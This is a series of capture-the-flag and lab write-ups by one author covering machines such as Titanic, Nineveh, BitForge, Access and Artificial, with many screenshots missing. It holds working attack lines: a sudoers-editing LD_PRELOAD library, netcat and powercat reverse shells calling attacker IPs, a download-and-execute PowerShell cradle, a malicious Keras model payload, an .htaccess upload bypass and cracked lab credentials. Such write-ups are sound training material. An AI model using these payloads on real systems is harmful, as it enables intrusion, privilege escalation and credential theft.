Now that I had a more stable shell I went on with enumeration.

From these files I noticed that getprofile.sh zipped log files:

Privilege Escalation

We will now be inspecting the getprofile.sh script and check for symlinks.

:::important When zipping files, symlinks are one of the most important things to look for. :::

:::note For this I will also be following along with the ippsec video as I do not know enough about symlinks. :::

We notice inside the script that it's grabbing the last 500 characters from the cmdsubsys.log file and zipping it into the cmdsubsys.txt file inside the zip. Let's create a sym link involving the presumed id_rsa file from root.

Let's see if it worked.

We then head on down the rabbit hole until we find the correct file.

Perfect, let's copy it over and get our root shell.

Just like that we've got access as root.

root.txt

HTB-Titanic

Maxim Andrei Koltypin — Mon, 21 Apr 2025 00:00:00 GMT

Scope:
10.10.11.55

Recon

Nmap

sudo nmap -sC -sV titanic -sT -T5 --min-rate=5000 -Pn -vvvv

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://titanic.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: titanic.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

We only have 2 ports, let's check out port 80 first.

80/TCP - HTTP

Let's check out what happens underneath with burp

Burpsuite

Accordingly it then gives us a GET request:

Since there's nothing else here this points to a HIGHLY LIKELY LFI/RFI.

LFI

We test it using the standard /etc/passwd file:

It seems to work! We found a user developer in here.

:::success For CTF purposes I then got the user.txt flag, but best case I would first need to get RCE: :::

From here I could go ahead and try to get RCE.

I had hoped that there would be an id_rsa file inside the .ssh directory of developer but alas:

:::note As always I'd have to think outside the box here, I tried to look up LFI werkzeug on Google however whatever I tried it didn't work. :::

Eventually I tried the following:

By checking out the target's /etc/hosts file we found the dev subdomain! Let's add it and check it out.

It's running 2 GitHub repo's.

The docker-config repo seems interesting:

We find a MYSQL_ROOT_PASSWORD:

MySQLP@$$w0rd!

Furthermore we also find a path:

As per the official GitHub repo we should be able to check out the /gitea/<CUSTOM>/conf/app.ini page:

After some wrestling around, this turned out to be the correct one:

SQLite3

The [database] part seems interesting, let's try to fetch the gitea.db file.

:::success This worked and returned a shitload of SQL code. :::

This seems to return some hashes, let's try to decrypt this shit.

First we will save this file in order to query it using SQLite3.

We will then delete the header in order to be able to query the db:

:::fail This did NOT work and it wouldn't recognize the fail as a .db file, instead I opted for curl to save the file with full integrity. :::

Right, let's query the DB now.

sqlite> SELECT * FROM user;
1|administrator|administrator||root@titanic.htb|0|enabled|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136|pbkdf2$50000$50|0|0|0||0|||70a5bd0c1a5d23caa49030172cdcabdc|2d149e5fbd1b20cf31db3e3c6a28fc9b|en-US||1722595379|1722597477|1722597477|0|-1|1|1|0|0|0|1|0|2e1e70639ac6b0eecbdab4a3d19e0f44|root@titanic.htb|0|0|0|0|0|0|0|0|0||gitea-auto|0

2|developer|developer||developer@titanic.htb|0|enabled|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56|pbkdf2$50000$50|0|0|0||0|||0ce6f07fc9b557bc070fa7bef76a0d15|8bf3e3452b78544f8bee9400d6936d34|en-US||1722595646|1722603397|1722603397|0|-1|1|0|0|0|0|1|0|e2d95b7e207e432f62f3508be406c11b|developer@titanic.htb|0|0|0|0|2|0|0|0|0||gitea-auto|0

From the .schema user query I notice that the 8th and 9th column are the passwd and passwd_hash_algo.

Hashcat

In order to crack this hash I looked up some tools to simplify the process, since hashcat doesn't support pbkdf2 hashes:

Let's make a new query that grabs all relevant parts:

:::fail Unfortunately the root hash wouldn't crack. :::

However the developer hash cracked right away:

developer
25282528

Foothold

I was now in, awesome!

user.txt

For logging purposes:

Enum

Unfortunate.

I transferred over linpeas.sh and started doing enumeration.

Interesting, perhaps the identify_images.sh will be a quick win.

Let's check out what this script is doing

Privilege Escalation

Apparently it's using software called ImageMagick to identify images and then push them into the metadata.log file:

CVE-2024-41817

There's an existing CVE for this software:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("echo 'developer ALL=(ALL) NOPASSWD:ALL' | sudo tee -a /etc/sudoers");
}

Above command makes developer user able to use sudo without using password.

gcc -fPIC -shared -o ./libxcb.so.1 a.c -nostartfiles

root.txt

:::summary As ChatGPT summarizes the privesc technique: Overall MEDIUM difficulty for me at this stage, definitely needed some help with the priv esc simply because I did not fully understand it yet. :::

HTB-Paper

Maxim Andrei Koltypin — Tue, 22 Apr 2025 00:00:00 GMT

10.10.11.143

Recon

Nmap

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -sT -T5 -vvvv -p- 10.10.11.143

PORT    STATE SERVICE  REASON  VERSION
22/tcp  open  ssh      syn-ack OpenSSH 8.0 (protocol 2.0)
80/tcp  open  http     syn-ack Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
| http-methods: 
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
443/tcp open  ssl/http syn-ack Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_ssl-date: TLS randomness does not represent time
| http-methods: 
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
commonName=localhost.localdomain/organizationName=Unspecified/countryName=US/emailAddress=root@localhost.localdomain/organizationalUnitName

80/TCP - HTTP

There really is nothing here, time for feroxbuster to do its thing.

Unfortunately apart from a bunch of /manual/ endpoints we don't find anything useful, let's check 443:

Since this didn't tell us anything I decided to check the response headers:

I found an X-Backend-Server header with the office.paper variable. I decided to add it to my /etc/hosts list as this was HIGHLY LIKELY a subdomain.

Correct indeed! Let's check the tech stack:

It's running WordPress 5.2.3, let's see if it's vulnerable.

It is vulnerable, let's see if this is what we need to find.

According to above comment it looks like it is the correct CVE, let's exploit it.

I went ahead and registered a new account via the found URL:

LFI

This was all fun and games but I had no access to the admin panel, so I decided to check what I could get from the bot:

I was able to list files from the /sales/ directory.

However I was also able to get the contents from the / directory.

Even better news:

Let's check out dwight's /home directory.

Even though I had access, I unfortunately did not find a .ssh key here nor could I read the user.txt file yet.

However I noticed the /hubot directory, and checked it out:

In here I found the .env file which usually contains stuff developers want to hide from the rest.

Hell yeah.

recyclops
Queenofblad3s!23

When I try to log in I get the above message, but I am still able to log in:

Foothold

Let's see if dwight uses the same password for SSH:

EZ PZ access.

user.txt

Other than that I have no sudo privs:

Privilege Escalation

I decide to download over linpeas.sh and run it.

I noticed this one which I haven't seen before amongst the suggestions, let's check it out.

Let's verify the version of polkit running:

I found a script that should automatically do this:

Hell yeah.

root.txt

HTB-Nineveh

Maxim Andrei Koltypin — Wed, 23 Apr 2025 00:00:00 GMT

Scope:
10.10.10.43

Recon

Nmap

sudo nmap -sC -sV nineveh -sT -T5 --min-rate=5000 -Pn -vvvv

PORT    STATE SERVICE  REASON  VERSION
80/tcp  open  http     syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open  ssl/http syn-ack Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).

443/TCP - HTTPS

I decided to launch feroxbuster and brute force directories.

I found a phpLiteAdmin page with version 1.9 running. This version has multiple vulnerabilities but let's first narrow it down. I decided to launch gobuster as well to do some more recon.

I found another interesting endpoint, let's check it out.

Strings

Interesting, I saved the pictures and ran exiftool but didn't get anything useful:

Let's check it out using strings.

Unfortunately for us the SSH port is closed thus we have no way of accessing it.

Hydra

Time to brute force our way into the /db endpoint:

I easily found the password and tried it out on the target:

We got access!

PoC

I then found a PoC on how to get PHP Code Injection:

Reproducing steps

Then we go ahead and fill in the field:

80/TCP - HTTP

We return to port 80.

Here we find out that there are 2 error messages, if I enter a different username than admin I get the following message:

More Hydra

Thus I yet again launched hydra to brute force myself in again:

And I was inside.

LFI

Judging from the URL my senses started tingling and pointing towards some sort of File Inclusion vulnerability:

Let's see whether this param indeed is vulnerable.

I tried a bunch of combinations but in the end I found this one to work:

/manage.php?notes=files/ninevehNotes/../../../../../../etc/passwd

:::success This is HIGHLY LIKELY because it still needs to read the note, when I input it without the ninevehNotes file it gives me this error: :::

Foothold

RCE via Webshell

We should now be able to use the LFI exploit on the shell that we previously made.

It worked!!!

Reverse shell

Time to get out of this restricted webshell and get a full reverse shell.

Awesome! We got access as www-data now.

I then wanted to enable ssh so I could use the found id_rsa key to log in, but I had no sudo privs:

Automatic Enum

I downloaded over linpeas.sh and started doing some enum.

While I found some possibly interesting PE vectors I also found this knockd binary:

This should be responsible for opening up the SSH port, which will let us get access with the amrois id_rsa key we found earlier.

Inside the knockd.conf file we found the sequence needed to open up SSH.

Port Knock

We will be using nmap to port knock, however since the sequence must be precise, we will write a bash one-liner for it:

for i in 571 290 911; do
for> nmap -Pn --host-timeout 100 --max-retries 0 nineveh.htb -p $i        
for> done;

Now we can go ahead and SSH into the system.

Shell as Amrois

user.txt

Privilege Escalation

pspy64

I transferred over pspy64 in order to check out the running PID's and found some interesting ones running under root:

Apparently there's a binary checking for rootkits.

I'll go ahead and look up whether there's some sort of exploit for this binary:

Indeed there is, a pretty old one at that as well, let's grab it.

:::note There's also a msfconsole version of it, but I want to do it manually. :::

I then went ahead and put a reverse shell inside a /tmp/update file:

Now it's sit and wait for the shell to fire.

root.txt

PG-Extplorer

Maxim Andrei Koltypin — Wed, 07 May 2025 00:00:00 GMT

Scope:
192.168.184.16

Recon

Nmap

sudo nmap -sC -sV extplorer -sT -T5 --min-rate=5000 -Pn -vvvv -p-

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/TCP - HTTP

I head on over and get routed to the following URL right away.

Not too sure whether this is supposed to be exposed...or whether we can exploit it ðŸ¤”

I looked it up and found a juicy Bug Bounty WriteUp about this exact topic, let's see if we can follow along:

This walkthrough was a bust as I was not able to create a sql account on the linked website, neither did simple testing pass this page:

So instead I launched feroxbuster and started enumerating.

Feroxbuster

I tried out this endpoint instead:

Cool we get a login page!

Nice, simple admin - admin, let's try it out.

We get in and I notice 2 users:

I went ahead and changed dora to Admin status as well, who knows if anything good will come from it.

Let's try to find some sort of exploit:

I was able to upload a webshell

EZ PZ

Foothold

Shell as www-data

From here I just had to send myself a reverse shell:

I used the upload feature on penelope to upload linpeas.sh and other stuff to enhance my exploitation:

I found that dora is part of the disk group.

This file looks rather interesting?

I went on and viewed it via the website just because I still had access:

Turns out there's a hash hidden in here.

Hash cracking time

Let's crack this shit:

EZ PZ

Shell as dora

local.txt

Privilege Escalation

Exploiting disk group privs

From my enum I had already found that dora is part of the disk group, let's find out how we can exploit this.

I found a handy guide for this:

proof.txt

Following this principle I got proof.txt super easily:

But seeing as we actually need root access to pass the exam we will have to escalate privileges somehow.

Post-Exploitation

The actual intended route to getting root is as follows:

We get the root hash, time to crack it and escalate privs.

Finished 21:15 07-05-2025

[^Links]: [[OSCP Prep]]

#Wordpress

PG-Apex

Maxim Andrei Koltypin — Sat, 10 May 2025 00:00:00 GMT

Scope:
192.168.231.145

Recon

Nmap

sudo nmap -sC -sV apex -T5 -vvvv --min-rate=5000 -sT -p-

PORT     STATE SERVICE     REASON  VERSION
80/tcp   open  http        syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-title: APEX Hospital
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
445/tcp  open  netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       syn-ack MariaDB 5.5.5-10.1.48
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.1.48-MariaDB-0ubuntu0.18.04.1
|   Thread ID: 52
|   Capabilities flags: 63487
|   Some Capabilities: SupportsCompression, LongPassword, Support41Auth, Speaks41ProtocolOld, ConnectWithDatabase, InteractiveClient, IgnoreSigpipes, SupportsLoadDataLocal, SupportsTransactions, DontAllowDatabaseTableColumn, LongColumnFlag, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, ODBCClient, FoundRows, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: =_I0R/2Ja(BQT/.:xm;~
|_  Auth Plugin Name: mysql_native_password

445/TCP - SMB

Enum4linux-ng

Time to check out the docs directory.

Smbclient

I checked out the .pdf files and they contained a few pages of medical records and such.

Exiftool

Just in case I used exiftool to view the metadata of the files.

80/TCP - HTTP

I opened up my browser and expected to see some sort of hospital website:

Indeed it is.

Here I find a few possible usernames:

The contact form didn't seem vulnerable:

I clicked on Scheduler and this took me to a login page:

I tried out admin - admin but this didn't work:

Gobuster

I launched gobuster to enumerate the directories and endpoints:

I found a admin.php page which I checked out:

Awesome we found the version, let's look for an exploit!

We need to be authenticated though, we have potential usernames but not the passwords.

I started searching further and found the following directory:

In here I could apparently upload files!

LFI - Responsive Filemanager 9.13.4

I tried uploading a webshell but it wasn't allowed:

We could now brute force filetypes and check whether any would be allowed but I decided to enumerate further first.

I noticed a little question mark in the top right corner:

Ah yes... We now got another version.

Pretty straightforward

Unfortunate

We need to find another way to get RCE.

Foothold

Checking Source Code

I checked out GitHub where I found the source code to openemr where they had the following sqlconf.php file:

I checked whether this existed here, perhaps it could contain credentials:

No error, meaning it HIGHLY LIKELY exists, let's try reading it using the LFI exploit.

:::important Before doing this however we need to make slight changes to the PoC, we'll have to change the read_file url_path so we can get the file via smb, namely because the file won't be read on the client side as it is a .php file: :::

Now we can grab it and check the contents.

3306/TCP - MySQL

:::warning I had to issue the skip_ssl option otherwise it WOULD NOT WORK!!!! :::

We gain access with the found password.

This was obviously not the pass?

I checked the tables again:

$2a$05$bJcIfCBjN5Fuh0K9qfoe0eRJqMdM49sWvuSGqv84VMMAkLgkK8XnC
$2a$05$bJcIfCBjN5Fuh0K9qfoe0n$

Hashcat

I threw the hash into hashcat:

I could now use these creds to log in to the portal.

admin
thedoctor

RCE - OpenEMR 5.0.1

I then followed the previously found github RCE steps:

Yeah this didn't work, let's check alternative scripts.

I went ahead and launched the following one:

local.txt

Privilege Escalation

Shell as root

Since the password was for the admin user, we can try and password spray before doing any further enum:

Easiest privesc ever.

proof.txt

PG-Billyboss

Maxim Andrei Koltypin — Fri, 16 May 2025 00:00:00 GMT

Scope:
192.168.128.61

Recon

Nmap

sudo nmap -sC -sV billyboss -sT -vvvv -p- -Pn -T5 --min-rate=5000 

PORT      STATE    SERVICE         REASON      VERSION
21/tcp    open     ftp             syn-ack     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open     http            syn-ack     Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-favicon: Unknown favicon MD5: 8D9ADDAFA993A4318E476ED8EB0C8061
|_http-cors: HEAD GET POST PUT DELETE TRACE OPTIONS CONNECT PATCH
|_http-title: BaGet
| http-methods: 
|_  Supported Methods: GET HEAD
135/tcp   open     msrpc           syn-ack     Microsoft Windows RPC
139/tcp   open     netbios-ssn     syn-ack     Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds?   syn-ack
5040/tcp  open     unknown         syn-ack
7680/tcp  open     pando-pub?      syn-ack
8081/tcp  open     http            syn-ack     Jetty 9.4.18.v20190429
| http-robots.txt: 2 disallowed entries 
|_/repository/ /service/
|_http-title: Nexus Repository Manager
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-favicon: Unknown favicon MD5: 9A008BECDE9C5F250EDAD4F00E567721
|_http-server-header: Nexus/3.21.0-05 (OSS)
49664/tcp open     msrpc           syn-ack     Microsoft Windows RPC
49665/tcp open     msrpc           syn-ack     Microsoft Windows RPC
49666/tcp open     msrpc           syn-ack     Microsoft Windows RPC
49667/tcp open     msrpc           syn-ack     Microsoft Windows RPC
49668/tcp open     msrpc           syn-ack     Microsoft Windows RPC
49669/tcp open     msrpc           syn-ack     Microsoft Windows RPC

21/TCP - FTP

I then tried out the secure version lftp:

Didn't work either.

8081/TCP - HTTP

However this exploit still requires a set of valid creds which we do not have.

Other than that I can only find the following according to nmap:

Access

Alright so I guess we will need to guess credentials?

nexus - nexus worked!

So what can we actually do here?

Doesn't seem interesting, but we found the PoC so let's check it out.

PoC

We modify it to suit our needs:

Foothold

Shell as Nathan

I execute the PoC

We get a shell back.

:::note Interestingly we land inside the Nexus directory which is in nathan's Users folder. :::

Since this is the case we must have interesting privileges, as Windows users running the web server usually have the SeImpersonatePrivilege enabled:

Indeed! We can try to escalate privs right away.

Privilege Escalation

SeImpersonatePrivilege

:::fail PrintSpoofer failed, let's see if GodPotato will work :::

We got a reverse shell although it is unclear whether we are actually SYSTEM.

flags

PG-BitForge

Maxim Andrei Koltypin — Mon, 19 May 2025 00:00:00 GMT

Scope:
192.168.102.186

Objectives

:::note This lab challenges learners to exploit a web application's misconfigurations, retrieve sensitive data, and escalate privileges to gain root access. Using tools to explore exposed .git directories, compromise the SOPlanning application, and abuse misconfigured permissions, you will develop your skills in enumeration, exploitation, and privilege escalation. :::

In this challenge, learners will exploit a series of vulnerabilities in the BitForge environment, including exposed .git directories, weak password storage mechanisms, and a vulnerable SOPlanning application. The lab culminates in exploiting a writable Flask application to escalate privileges and gain root access, testing skills in enumeration, exploitation, and lateral movement.

Attack BitForge

Enumerate the target system to identify open ports and subdomains.
Exploit exposed .git directories to retrieve sensitive configuration files and credentials.
Gain authenticated access to the SOPlanning application and leverage CVE-2022-37386 to execute arbitrary code.
Escalate privileges by exploiting misconfigured cron jobs and writable application files.
Achieve root access by modifying application behavior via a Flask-based privilege escalation vector.

Recon

Nmap

sudo nmap -sC -sV bitforge -sT -vvvv -p- -Pn -T5 --min-rate=5000

PORT     STATE  SERVICE    REASON       VERSION
22/tcp   open   ssh        syn-ack      OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
80/tcp   open   http       syn-ack      Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://bitforge.lab/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-git: 
|   192.168.102.186:80/.git/
|     Git repository found!
|     .git/config matched patterns 'user'
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: created .env to store the database configuration 
3306/tcp open   mysql      syn-ack      MySQL 8.0.40-0ubuntu0.24.04.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=MySQL_Server_8.0.40_Auto_Generated_Server_Certificate
| Issuer: commonName=MySQL_Server_8.0.40_Auto_Generated_CA_Certificate
| mysql-info: 
|   Protocol: 10
|   Version: 8.0.40-0ubuntu0.24.04.1
|   Thread ID: 29
|   Capabilities flags: 65535
|   Some Capabilities: Support41Auth, Speaks41ProtocolOld, LongPassword, SupportsTransactions, IgnoreSigpipes, FoundRows, ODBCClient, SupportsCompression, Speaks41ProtocolNew, InteractiveClient, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, SupportsLoadDataLocal, LongColumnFlag, DontAllowDatabaseTableColumn, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: +SbaN=J9\x1F?MM.FC:q\x12?d
|_  Auth Plugin Name: caching_sha2_password

80/TCP - HTTP

We find a .git repo using nmap so let's check it out:

git-dumper

Let's check out what we get.

Using git log we can check the commit history:

Interesting! Let's check out this commit.

Hell yeah.

BitForgeAdmin
B1tForG3S0ftw4r3S0lutions

We can try it out on the MySQL server since they're creds for a db.

3306/TCP - MySQL

The creds work and we're in!

I notice 2 non-default databases namely bitforge_customer_db as well as soplanning.

I decide to check out the latter first.

I wasn't able to crack the hash but also noticed a cle part in the table, not knowing what it was I started checking online where I found this post containing info on how to get access to SoPlanning:

SoPlanning

MySQL UPDATE on creds

I found a subdomain here:

When I clicked on it I had to add the plan.bitforge.lab subdomain to my /etc/hosts list.

Another login page, however this time for employees.

Since we still didn't know the exact cleartext password I got kinda stuck.

[!info] I then found out online that I could try and UPDATE the password within MySQL to fit any other password of my liking, that way I wouldn't have to go to the trouble of cracking the existing hash.

Within the source code I found the standard SHA-1 password for admin:

According to online this password hash SHOULD match admin:

Let's try and overwrite it.

UPDATE planning_user SET password='df5b909019c9b1659e86e0d6bf8da81d6fa3499e' WHERE user_id='ADM';

It succeeded! Let's try to log in.

RCE PoC

We successfully log in!

Let's give the following PoC a shot:

I use searchsploit to get the PoC and launch gobuster again to verify whether all the endpoints in the PoC match:

Looks good enough, let's launch it.

Foothold

Shell as www-data

Awesome, I upgrade my shell:

busybox nc 192.168.45.185 3306 -e bash

I notice there are 2 users on this target, jack and ubuntu.

At the moment I am not allowed to view either one.

We find something interesting!

Awesome, we can proceed with it as Jack, first we need access as him.

I download over pspy64 to see the running processes:

Luckily for me, amongst the results is the cleartext password for jack!

jack
j4cKF0rg3@445

Lateral Movement

I log in to ssh as jack:

local.txt

Privilege Escalation

Flask app

Returning to the flask app we should figure out what to do with it.

Turns out we can run it as root?

So it is essentially a bash script that runs app.py, got it

Let's go ahead and change the contents of app.py:

EZ PZ!

proof.txt

PG-Access

Maxim Andrei Koltypin — Thu, 29 May 2025 00:00:00 GMT

Scope:
192.168.102.187

Recon

Nmap

sudo nmap -sC -sV access -sT -vvvv -p- -Pn -T5 --min-rate=5000

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
80/tcp    open  http          syn-ack Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
|_http-title: Access The Event
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
| http-methods: 
|   Supported Methods: POST OPTIONS HEAD GET TRACE
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-05-19 08:13:45Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      syn-ack Apache httpd 2.4.48 (OpenSSL/1.1.1k PHP/8.0.7)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
49670/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         syn-ack Microsoft Windows RPC
49674/tcp open  msrpc         syn-ack Microsoft Windows RPC
49679/tcp open  msrpc         syn-ack Microsoft Windows RPC
49701/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Hosts: SERVER, www.example.com; OS: Windows; CPE: cpe:/o:microsoft:windows

80/TCP - HTTP

I went ahead and used username-anarchy to create a username list out of them and tried to use kerbrute to enumerate users:

Unfortunate no matches.

This form doesn't work, so we don't have to keep testing it.

I inspect the site a bit more and find this.

This could be a File Upload attack.

This could however also be a Reflected XSS on second thought?

File Upload Attack

This is the script that we get upon submit.

Let's get to testing.

Let's try it out by adding a XSS comment inside the picture instead.

The payload does not get triggered however confirming that XSS is not the way.

Seems like we're left with the file upload attack.

Using gobuster I was able to find the /uploads endpoint:

We find our uploaded file here, let's try to upload a malicious webshell.

Using burp I intercept the request:

And here I will try to add my malicious webshell.

I turned it around:

After multiple tries I still got the following:

Overwriting .htaccess

Frustrated I started my further enumeration online, thinking I hit a dead end.

I then found out I was on the correct path but I just had to do something I had never done before:

Apparently we can try and overwrite the .htaccess file by uploading our own which will then allow us to upload a php web or reverse shell.

echo "AddType application/x-httpd-php .pwn" > .htaccess

:::info We create a new file type which we will allow via the .htaccess file, we should then be able to upload the file and treat it as an php file :::

Foothold

Shell as svc_apache

We boot up a listener before uploading the file.

:::fail Unfortunately penelope didn't like this: :::

Since we're a svc account I crossed my fingers hoping we have the SeImpersonatePrivilege enabled.

:::fail Wuap wuap.... :::

I instantly start my enumeration:

Seems there's another service account, svc_mssql. This LIKELY means we'll have to do some lateral movement before getting Admin privs.

Lateral Movement

I check the handy cheatsheet:

We probably need to kerberoast here.

Let's transfer over rubeus and get to work!

Kerberoasting

Nice and easy, let's try and crack it.

:::success john cracks it INSTANTLY. :::

svc_mssql
trustno1

Password Spray

However it looks like we can't get access to winrm:

RunasCs

To circumvent this issue and get access as svc_mssql via our existing reverse shell we can use the following script:

Thus we have verified that we can execute commands as svc_mssql. We can now go ahead and create a reverse shell by uploading powercat.ps1 in order to get a reverse shell as svc_mssql.

We will put the following line inside the -Command brackets:

Powershell IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.185/powercat.ps1');powercat -c 192.168.45.185 -p 443 -e cmd"

local.txt

Privilege Escalation

SeManageVolumePrivilege

Yet again no ez win?

Or isn't it?

Simply download and execute it:

Now we can write files to the C:\ drive.

:::tip Why is this useful you say? Well because there's a shit ton of DLL's inside the /Windows/System32 folder which we can now hijack using our own crafter reverse shell! :::

DLL Hijacking

We will be using the tzres.dll file.

:::info I could've used any .dll but was too lazy to do my research so I used a proven one. :::

:::note The good thing about hijacking this dll is that you can then call upon it by issuing systeminfo: :::

Eventhough it says it failed it really didn't:

proof.txt

HTB-Artificial

Maxim Andrei Koltypin — Wed, 25 Jun 2025 00:00:00 GMT

Scope:
10.10.11.74

Recon

Nmap

sudo nmap -sC -sV -sT -vvvv -p- -Pn -T5 --min-rate=5000 artificial

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://artificial.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/TCP - HTTP

Anyhow we go to the /register page where we can easily sign up with a new account and log in afterwards:

Burpsuite

I launch burp so I can view the request better:

So instead what we'll want to do is create a valid .h5 file with our reverse shell in it, upon file upload and running it on the client we should get RCE.

docker

The Dockerfile that we find on the web page contains the instructions that we need to follow:

So we'll have to craft up the docker container:

Now we can go ahead and supply it our python code which will generate a malicious h5 file:

# gen.py

import tensorflow as tf

def exploit(x):
    import os
    os.system("rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.15 80 >/tmp/f")
    return x

model = tf.keras.Sequential()
model.add(tf.keras.layers.Input(shape=(64,)))
model.add(tf.keras.layers.Lambda(exploit))
model.compile()
model.save("exploit.h5")

Inside the docker container we will then craft it:

We can now upload and run it in order to get RCE.

Foothold

Shell as app

I now upload the model:

And click on View Predictions:

Just like that we get a reverse shell!

I notice there's a user on the system called gael.

gael was also part of the sysadm group, would be nice to move laterally to him.

Inside /opt I find the following:

This looks interesting for later on.

Enumeration

Unfortunate.

Time to check out the /opt directory.

:::note This led to a whole lot of nothing, instead I went on to enumerate where i landed in the first place :::

SQLite DB

I found the above in one of the subdirectories. I transfered the file over and used sqlite to read it.

I then went on and used crackstation to crack the hashes:

gael
mattp005numbertwo

Lateral Movement

I used the first one in the table that corresponded to gael to log in via ssh.

user.txt

Privilege Escalation

sysadm group

There's only 1 file that we actually have access to being part of this custom group:

I went ahead and copied it over and extracted it:
